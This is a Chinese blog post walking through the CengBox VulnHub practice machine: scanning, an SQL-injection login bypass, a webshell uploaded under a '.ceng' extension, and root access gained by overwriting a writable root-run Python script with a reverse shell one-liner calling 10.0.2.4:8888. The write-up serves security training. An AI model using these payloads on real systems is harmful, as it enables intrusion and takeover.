CengBox靶机

最新推荐文章于 2023-11-02 19:57:59 发布
最新推荐文章于 2023-11-02 19:57:59 发布
阅读量326 收藏
点赞数
分类专栏: 靶场日记 文章标签: php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hesysd/article/details/127969177
版权

0x01 信息收集

nmap -sV 10.0.2.6

22 ssh端口,弱口令爆破为主

80 web页面 目录遍历,备份文件查找等

dirsearch -u http://10.0.2.6

获取了目录,发现存在一个maseradmin目录,可能存在些东西,继续扫。

dirsearch -u http://10.0.2.6/masteradmin

发现了db.php login.php upload.php 三个页面

0x02 sql注入

我们先看下页面。登陆页面的测试思路主要是sql注入,弱口令 js文件等。这里测试发现了万能密码,也就是说存在sql注入

admin' or'1'='1'#

同时我们也可以用sqlmap跑出数据库。

0x03 文件上传

登录后发现是个上传界面

尝试上传图片或者php,发现都无法上传。发现左上角有个黑色的字体

extension not allowed, please choose a CENG file.

好像只允许上传CENG后缀的文件

上传后发现返回包并不会返回上传路径。

不过前面在信息收集的时候发现了一个uploads/ 目录,尝试访问试试。

发现确实是上传上去了,不过有个告警。测试了下,发现并没什么用,shell文件正常反弹回来了

(因为是apache,所以盲猜是.htaccss文件里面将ceng解析成了php,后来连接后也验证了)

0x04 提权

suid提权

find / -perm -u=s -type f 2>/dev/null

发现并没什么能提权的东西。

计划任务提权

cat /etc/crontab

还是没啥可利用的。

切换目录

尝试去各各目录看看。这里在看的时候,突然想到之前信息收集获取到的db.php文件。赶忙去看下,结果总算有了收获。

获得了数据库的账户密码,但是由于没开3306端口,并没有办法连接。

不过上面我们还通过sql注入获取了一个账户,尝试切换登录试试。

发现登录成功!这里还是老样子,suid提权 任务计划看看,找了半天,并没有什么能提权的思路。

上传脚本检测

python -m SimpleHTTPServer 80	# 本地开一个简单http服务

查看操作系统版本,是64位的

umane -a

上传64位的检测脚本 pspy64

执行该脚本

这个脚本的作用是实时检测系统中运行的进程

chmod +x pspy64
./pspy64

发现一条可用信息,root权限运行md5check,去看看是什么

/opt/md5check.py

发现 user 组用户可读可写,而我们cengover用户刚好属于user组

把这个文件改掉,改为 python 反弹shell 即可

python -c 
'import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.0.2.4",8888));
os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

启动监听,等待 md5check 自动运行

成功反弹回shell

匿名用户0x3c
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
VulnHub CengBox2靶机渗透
Jonah_Bare的博客
06-23 723
​转载至自家微信公众号 难度评级:☆☆☆☆官网地址:https://download.vulnhub.com/cengbox/CengBox2.ova天翼云盘:https://cloud.189.cn/t/nq6r6jQVRZBz百度网盘:https://pan.baidu.com/s/1EMIZg3x2ebqOdRmif4O2Jg 提取码:gt6g官网简介:Ceng Company似乎正在维护,但仍可能运行着某些业务渗透目标:获取普通用户以及root用户权限本机地址:192.168.110.27靶机
cengBox靶机wp
m0_52496313的博客
08-05 379
cengBox靶机wp
Vulnhub靶机--Cengbox
Tauil的博客
08-13 642
使用该账号密码进行登录,发现是一个文件上传的php文件,上传任意内容,发现只能上传他指定的ceng文件类型。但是该处存在一个解析漏洞,会将ceng文件解析成php文件,所以上传包含以下内容的ceng文件。界面,输入任意内容,打开 burpsuite 进行抓包,将数据包保存下来。文件夹,猜测一个是上传到该处,访问该处的文件,文件正常。应该是一个管理员登录界面,后面可以看到网站主页是。进行php文件细致的探测,输入命令。尝试ssh连接,密码就是之前获得的。,查看后台进程,文件获取地址。获得大致目录,推测目录。.
cengbox1靶机
小小猪的博客
07-03 278
cengbox1靶机 arp-scan -l 扫描靶机IP地址 nmap -sV -Pn -A x.x.x.136 扫描端口信息 访问80端口 对80端口进行爆破 发现登录界面 进行burp抓包 进行sqlmap爆破,sqlmap -r 4.txt --dbs,爆破出数据库 爆破出表 爆破出列 爆破出用户名和密码 登录,发现上传点 只能上传图片 制造后门 上传成功 msf进行监听 访问上传文件,反弹.
cengbox3_靶机渗透
wuerror的博客
03-18 577
未曾设想的道路 这个靶机做起来问题挺多的,可能是我用的VMware的缘故。最终也没做到最后 开局arpscan,nmap各种方式扫了一圈都未能成功获取到靶机IP。通过救援模式进入shell修改网卡配置解决。具体可以参考链接,改完之后虚拟机也要重启一次,才能正常使用, 信息收集 nmap先扫一波开放端口 nmap -sV 192.168.218.130 -p 1-65535 Host is up (0.00064s latency). Not shown: 997 filtered ports
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
安装部署Web安全测试用的靶机
11-24
为了进行有效的测试,我们需要模拟真实的环境,这就是靶机的作用。本实验旨在通过安装部署Web安全测试靶机,包括DVWA、MCIR、Pikachu、mutillidae和BWAPP,来提供一个安全学习和实践的平台。 首先,安装XAMPP,这是...
PWN靶机环境 网络安全
05-23
PWN靶机环境
Vulnix.7z靶机
04-25
一个vulnhub上的靶机,因为网络原因,下载的特别慢,我下载好,上传上来,供大家学习。如果大家有更好的靶机,请私我。
vulnhub之CengBox3
鲨鱼辣椒的博客
08-08 843
信息搜集 扫描网段
vulnhub靶机-cengbox2
臭nana的博客
06-25 602
vulnhub靶机-cengbox2
vulnhub-Cengbox2
qq_41810304的博客
06-20 390
前言: kali:192.168.1.4 目标机:192.168.1.35 信息收集: 漏洞挖据: 从扫描信息来看,ftp可以匿名登录,登录后获取文件note.txt,内容如下: 这是个提示,ceng-company.vm是个域名。先IP访问后,页面如下: 分析源码也没有任何用处,爆破文件,也没有任何收获(图略)。修改host文件,添加如下: 访问后依然如上图,爆破文件依然没有收获。既然有域名,会不会存在子域名,注意,不要使用subDomainsBrute,它是真的去DN
cengbox靶机(SQL注入、文件上传漏洞)
m0_66299232的博客
11-23 554
将python -c 后面的利用即可因为md5check.py文件本身就是python脚本。4.抓包后看到提示,让上传一个后缀为ceng的文件,那就把木马改成weiqin.ceng。用SHELL=bash script -q /dev/null 回弹 ,还是上传我们的php-reverse-shell.php 文件,7.开启监听成功反弹shell 发现是root 成功拿下!2.发现‘or 1=1--' 可以注入成功 并且登录进去。7.回弹shell成功,发现是一个普通用户。SQL注入、文件上传漏洞
cengbox2靶机(hydra爆破、公私钥免密登录)
m0_66299232的博客
12-06 544
靶机链接:百度网盘 请输入提取码提取码:zdpr虚拟机网络链接模式:桥接模式攻击机系统:kali linux 2021.11.arp-scan -l探测目标靶机ip2.nmap -p- -A -T4 192.168.1.107探测目标靶机开放端口和服务3.gobuster dir -u http://192.168.1.107 -w /usr/share/wordlists/dirb/big.txt -t 50用gobuster扫描目录,啥也没有1.登录ftp,将note.txt下载下来2.得到俩个名字ke
带你玩转渗透测试靶机Vulnhub-CengBox3
最新发布
m0_74025111的博客
11-02 118
结果出来了,非常帅呀,今天的主角开了蛮多端口的嘛80,443端口皆是HTTP服务的,所在443端口的Apache2.4.18 为SSL,ceng-company.vm这个是域名,还有我们最熟悉的22端口,但是这个没开启ssh服务呀!使用kali自带的wireshark分析该数据包,由于我的wireshark出现故障了,没有办法给大家演示,你们可以在自己的kali里去复述,我之前做的时候就已经找过密码了,我在这里直接展示出来给大家。我们在url的后面上是有一个cmd的,我们将反弹语句在cmd上执行。
CengBoxV1渗透笔记】
勿山几已
03-20 268
记录vulnhub靶场CengBoxV1的渗透过程
CengBox3渗透笔记
勿山几已
03-31 447
这是cengbox系列靶机的第三个,也就是最后一个,这三个靶机难度恰好覆盖简单、中等、困难不同阶段,都做一下能感受到不同难度靶机的情况。
Hack The Box:Blue靶场
知柯信安
11-25 1313
Blue(蓝盒子) 欢迎订阅蓝色退休盒子! 这是另外一个简单的盒子,非常适合新人们熟悉nmap结果和使用metasploit。我启动这个盒子就像启动任何盒子一样,nmap扫描! 第一次扫描实际上只是用来查看目标主机上已打开并正在运行的内容。看一下,我们只看到3个服务和一堆端口打开。msrpc,netbios-ssn和microsoft-ds。如果这是您第一次入侵Windows计算机,您将经常看到这些服务。您将需要知道这些服务是什么。 MS-RPC是RPC协议的Microsoft实现。它曾经/仍然被用来制
Windows2008服务器上搭建五种靶机教程
"该资源是一份关于如何搭建五种不同靶机的教程,由张学飞撰写,主要针对Windows 2008服务器环境。涉及的靶机包括DVWA(Damn Vulnerable Web Application)、MCIR、Pikachu、mutillidae以及bWAPP。这些靶机主要用于...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

匿名用户0x3c

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值